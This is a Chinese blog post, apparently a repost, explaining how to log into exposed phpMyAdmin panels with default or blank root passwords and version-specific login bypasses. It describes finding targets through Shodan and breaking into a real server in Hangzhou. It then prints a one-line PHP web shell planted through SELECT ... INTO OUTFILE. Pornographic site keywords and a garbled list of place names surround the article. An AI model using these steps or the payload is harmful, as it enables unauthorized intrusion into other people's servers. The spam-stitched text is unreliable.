最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

phpMyAdmin通過(guò)密碼漏洞留后門文件

 更新時(shí)間:2018年11月20日 09:51:28   作者:吃面包的科學(xué)怪人  
今天小編就為大家分享一篇關(guān)于phpMyAdmin通過(guò)密碼漏洞留后門文件,小編覺(jué)得內(nèi)容挺不錯(cuò)的,現(xiàn)在分享給大家,具有很好的參考價(jià)值,需要的朋友一起跟隨小編來(lái)看看吧
  • 默認(rèn) phpMyAdmin:用戶名 root 密碼 root 或空登陸。
  • 版本 2.11.3~2.11.4:用戶名 'localhost'@'@" 登陸,無(wú)需密碼。
  • 版本 2.11.9.2:用戶名 root 登陸,無(wú)需密碼。

經(jīng)測(cè)試,第二個(gè)漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理從略。

下面讓我們簡(jiǎn)單的上網(wǎng)看看能不能找到一些存在這樣漏洞的登陸頁(yè)面。

祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。

phpMyAdmin

先看看有沒(méi)有不需要密碼登陸的,逐一嘗試沒(méi)有后尋找名字中包含的版本號(hào)。這里我找到一個(gè)國(guó)內(nèi)的(浙江省·杭州市)。

地址已手動(dòng)打碼。

http://121.***.*.219:80/

登陸成功(root 權(quán)限)。

接下來(lái)你可以寫一個(gè) outfile 到對(duì)方主機(jī)的網(wǎng)絡(luò)目錄下。俗稱 “留后門”。

SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后門文件的絕對(duì)路徑"

點(diǎn)擊運(yùn)行,不出意外便在對(duì)方主機(jī)留下了一個(gè)名為 runme.php 的后門文件。

總結(jié)

以上就是這篇文章的全部?jī)?nèi)容了,希望本文的內(nèi)容對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,謝謝大家對(duì)腳本之家的支持。如果你想了解更多相關(guān)內(nèi)容請(qǐng)查看下面相關(guān)鏈接

相關(guān)文章

最新評(píng)論

佛学| 高清| 青岛市| 阿巴嘎旗| 饶河县| 富源县| 商水县| 广河县| 永春县| 永仁县| 外汇| 奉贤区| 电白县| 定日县| 大同县| 寿宁县| 社旗县| 谢通门县| 宁河县| 讷河市| 沂水县| 巴东县| 五华县| 多伦县| 高雄市| 吉隆县| 平原县| 商南县| 广昌县| 虹口区| 峨山| 永宁县| 上思县| 镇坪县| 桃江县| 石林| 梧州市| 樟树市| 五峰| 汉源县| 广河县|